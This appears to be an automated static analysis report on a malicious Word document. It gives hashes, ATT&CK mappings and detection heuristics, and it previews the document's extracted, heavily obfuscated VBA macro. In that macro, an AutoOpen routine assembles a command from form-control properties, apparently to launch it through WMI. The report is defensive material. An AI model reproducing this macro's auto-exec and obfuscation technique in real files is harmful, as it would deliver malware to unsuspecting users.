Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 604a85fac22c26ed…

MALICIOUS

Office (OLE)

147.4 KB Created: 2019-05-09 06:32:00 Authoring application: Microsoft Office Word First seen: 2019-05-31
MD5: 59d3c614ad4c295bcd1996669067367a SHA-1: 666b1cadb57ae0eb73af716e14016894c2a19a05 SHA-256: 604a85fac22c26ed9dbc45f647f3dcaabe71b5b8a169da9f4d68b4f82dae871c
282 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter T1190 Exploit Public-Facing Application

The sample is a malicious Office document containing VBA macros. The macros trigger an AutoOpen event and use GetObject to interact with WMI, specifically launching the Win32_Process class. This indicates an attempt to execute arbitrary code, likely to download and run a secondary payload. The ClamAV detection 'Doc.Malware.Sagent-6971199-0' further supports its malicious nature.

Heuristics 8

  • ClamAV: Doc.Malware.Sagent-6971199-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Sagent-6971199-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7954 bytes
SHA-256: 9b8d702396a50184e0d4c8678068c6d9669caf77c485ce0886656f624034302f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "U7__0_2"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "E15741"
Attribute VB_Base = "0{385981A0-4F92-4FC0-B53A-3F985D0E0E8D}{06DEAA44-9530-4C6C-B3CE-EC724C705645}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "l393667"

Attribute VB_Name = "F9065_1"
Attribute VB_Base = "0{A57093E9-F0B8-4071-B174-B42496A92819}{58E5F28B-A7F4-402E-A3D7-D2E8A964EF30}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "J066_7_9"
Function i32_09(i2962_8)
         While U5697_8 And X170170_
 _
 _
 _
'r64934Q5_8742_E6045383r827295
'd367_5p54817_0c212_9f4460_
 _
 _
 _
 _
'W880__74M8922946z538_996f47324
      Wend
         While X4_14227 And c3__8958
 _
 _
 _
'f6723_1W_8__10P179416m543_2
'z90942u00410F56902i03623_
 _
 _
 _
 _
'p1107_j63841N278940K50918
      Wend
Set i32_09 = CVar(i2962_8)
         While j44183 And D607075
 _
 _
 _
'O_49_773f4_489_0c438309G6306_35
'n8087341t_9814i629_3_3b55472_
 _
 _
 _
 _
'k7509852b9216997j850_780h82832
      Wend
         While U8061626 And j830889
 _
 _
 _
'H3260166J190792r652582N35619
'P3156_5V0982773n28982b_81_3
 _
 _
 _
 _
'w2246_1O27270X068544u334_787
      Wend
         While W60917 And V4192007
 _
 _
 _
'q_90805i3__3419U16160_G47836
'U70141j65051N65403C1942686
 _
 _
 _
 _
'j3_41_s5710146F23272_3H39_135
      Wend
End Function
Sub _
autoopen()
On Error Resume Next
         While c23943_ And E6597021
 _
 _
 _
'r666_5s744_08m400180D584536
'z184459X977256W2908045a3100482
 _
 _
 _
 _
'A61_350M40_610R9__01W_8353
      Wend
         While Z742_8 And V399362
 _
 _
 _
'r12642i6_85719t8885_2K463887
'J625434p_88151X28259b23410_5
 _
 _
 _
 _
'R55553f_6423H6_115_F_492936
      Wend
         While L07923_6 And A__77_9
 _
 _
 _
'w51477i55_289w417411W29428
'B437121E55033z53784d2_05493
 _
 _
 _
 _
'Y5002__1H3309123T_396129j3269752
      Wend
Call S8931_
         While m4946477 And w51656
 _
 _
 _
'w4582833I1060493M3737231z907085
'E13106X698359i22_6239L48309_
 _
 _
 _
 _
'z3991897n5112_4_v141251r_35_6
      Wend
         While Y784536_ And s38_8679
 _
 _
 _
'Y5094371w1_4543_Z33_59o67915
'n01386r94575F633305P355216
 _
 _
 _
 _
'f5_651H76385i73_0056L788993
      Wend
End Sub


Attribute VB_Name = "i7131190"
Function S8931_()
On Error Resume Next
         While r7483213 And B__0_88
 _
 _
 _
'u837283A390_52X64292_8v436__
'f121_6G72_79L729_276m1990_
 _
 _
 _
 _
'Z19579w467726T97365r9854935
      Wend
         While D503377 And v4531452
 _
 _
 _
'i816776Z4763048s466687i_8288
'B_478580p3497_9F279_7w03007_
 _
 _
 _
 _
'J9209814o0485866I4_4_91w75699_
      Wend
D87232 = E15741.C05431.PasswordChar + F9065_1.G191_494 + E15741.C05431.ControlTipText + F9065_1.S2970591 + E15741.C05431.ControlTipText + E15741.C05431 + F9065_1.K_0_9655 + E15741.C05431.ControlSource + E15741.C05431.ControlSource + F9065_1.A5894_3 + E15741.C05431.ControlTipText + F9065_1.r87925 + E15741.C05431.ControlSource
         While f082232 And c3552_
 _
 _
 _
'r56_0807W825_0B42642N131347
'P45930E8__247u48414T95802
 _
 _
 _
 _
'K8644958V47297T36_3_t110370
      Wend
         While d831309 And w4_3072
 _
 _
 _
'O4003594W60_02_4N0_469J3640041
'Z93_5_20F2_40_7b553123j17963
 _
 _
 _
 _
'n45_388D42603_P16203H10478
      Wend
         While E94356 And i935800
 _
 _
 _
'm92867p91_420h822_960L0733835
'a734979T759_33o1701997m319433
 _
 _
 _
 _
't45_331F7118377Y663446
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.